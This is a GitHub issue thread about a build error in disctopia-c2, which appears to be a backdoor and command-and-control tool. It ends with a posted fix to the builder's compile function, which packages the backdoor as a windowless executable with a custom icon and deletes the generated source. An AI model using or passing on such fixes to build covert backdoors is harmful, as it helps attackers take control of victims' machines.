### ISSUE TITLE
Cannot find Executable for subprocess

### ISSUE THREAD

**Issue by 3lialka3bee** [3ct0s/disctopia-c2#11]
when i try to build it i get an error:
 
`Traceback (most recent call last):
  File "builder.py", line 179, in <module>
    builder.build()
  File "builder.py", line 43, in build
    self.compile()
  File "builder.py", line 50, in compile
    subprocess.call(compile_command)
  File "C:\Users\abdul\disctopia-c2\lib\subprocess.py", line 340, in call
    with Popen(*popenargs, **kwargs) as p:
  File "C:\Users\abdul\disctopia-c2\lib\subprocess.py", line 858, in init
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Users\abdul\disctopia-c2\lib\subprocess.py", line 1311, in _execute_child
    hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
FileNotFoundError: [WinError 2] The system cannot find the file specified 
`

**Comment by 3ct0s** [comment]
Hey there, thanks for reaching out.
Can you please tell me on which platform you are running disctopia? Windows or Linux?
Did you go through the installation steps with no errors?

**Comment by 3lialka3bee** [comment]
Am using windows

**Comment by 3ct0s** [comment]
Did you go through the installation steps with no errors?

**Comment by 3lialka3bee** [comment]
yes

**Comment by affeltrucken** [comment]
Bump. I had this exact error too and I'm using Windows 10.

**Comment by Archivine** [comment]
Found a fix.
Replace the compile function with

```python
def compile(self):
    print(self.BACKDOOR_NAME)
    compile_command = f"pyinstaller --onefile --noconsole --icon=img/exe_file.ico {self.BACKDOOR_NAME}.py"
    subprocess.call(compile_command, shell=True)
    try:
        os.remove(self.BACKDOOR_NAME+".py");os.remove(self.BACKDOOR_NAME+".spec")
    except FileNotFoundError:
        pass
```
